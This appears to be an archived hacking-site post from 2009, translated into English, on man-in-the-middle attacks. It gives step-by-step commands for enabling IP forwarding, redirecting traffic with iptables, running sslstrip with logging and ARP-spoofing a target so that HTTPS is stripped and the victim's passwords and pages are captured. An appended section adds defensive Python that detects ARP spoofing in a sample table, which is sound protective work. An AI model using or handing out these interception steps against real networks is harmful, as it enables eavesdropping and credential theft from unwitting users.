Hack attack: using sslstrip for MiTM attacks (bypassing HTTPS)

ID MYHACK58:62200924527
Type myhack58
Reporter Anonymous
Modified 2009-09-04T00:00:00


Everyone knows that MiTM attacks inside a network let an attacker intercept users' passwords and confidential information on that network more efficiently. In BackTrack this is done with the Ettercap or arpspoof tools. But Ettercap is only effective against protocols that transmit in clear text, such as HTTP, FTP, Telnet and SMTP. For HTTPS, which uses OpenSSL, it can't...... That was the case until Black Hat 2009, just held in the US, where a tool called sslstrip was released that appears to solve this problem.

The software can be found at http://www.thoughtcrime.org/software/sslstrip/index.html. Friends whose English is good can also watch his excellent talk at Black Hat. Because sslstrip is written in Python, it can be run without being installed.

Usage is divided into the following steps:

1) Use the command echo "1" > /proc/sys/net/ipv4/ip_forward to put your machine into forwarding mode.

2) Use the command iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 to have iptables redirect all HTTP traffic to sslstrip.

3) Run sslstrip -a -w ssllog (written to a text file)

4) Run arpspoof -i eth0 -t (target) (gateway)

Then wait patiently! ;) Note that the generated log file, ssllog, is actually in HTML format. It can be opened with Konqueror, so the pages the target is viewing are also clear to see. All of the above was tested on a LAN under BT3.
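
Step 4 works by poisoning the target's ARP cache, so the target ends up with the gateway's IP address mapped to the attacker's MAC address. The following is an added example, not part of the original post, that checks a Linux ARP table (the /proc/net/arp format) for that trace; the sample table, the MAC addresses and the function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample in Linux /proc/net/arp format (not captured data).
# The gateway 192.168.1.1 and host 192.168.1.23 resolve to the same MAC.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:00:00:66     *        eth0
192.168.1.23     0x1         0x2         02:00:00:00:00:66     *        eth0
192.168.1.40     0x1         0x2         02:00:00:00:00:40     *        eth0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        eth0
"""


def parse_arp_table(text):
    """Return (ip, mac, device) for each completed entry in the table."""
    entries = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, device = fields
        # Flag bit 0x2 (ATF_COM) marks a resolved entry; skip incomplete ones.
        if not int(flags, 16) & 0x2 or mac == "00:00:00:00:00:00":
            continue
        entries.append((ip, mac.lower(), device))
    return entries


def find_arp_spoofing(text, gateway_ip, pinned_gateway_mac=None):
    """Flag a gateway entry that differs from a pinned MAC or shares its MAC."""
    findings = []
    ips_by_mac = defaultdict(list)
    for ip, mac, device in parse_arp_table(text):
        ips_by_mac[(device, mac)].append(ip)
        if (ip == gateway_ip and pinned_gateway_mac
                and mac != pinned_gateway_mac.lower()):
            findings.append(("gateway-mac-mismatch", ip, mac))
    # One MAC answering for the gateway and another IP is the usual trace.
    # Proxy ARP or multi-homed hosts can cause it too, so treat it as a lead.
    for (_device, mac), ips in ips_by_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            findings.append(("shared-mac", mac, sorted(ips)))
    return findings


if __name__ == "__main__":
    for finding in find_arp_spoofing(SAMPLE_ARP_TABLE, "192.168.1.1",
                                     pinned_gateway_mac="02:00:00:00:00:01"):
        print(finding)
```

On a real host the table text would come from reading /proc/net/arp, and the pinned gateway MAC from a record taken while the network was known to be clean.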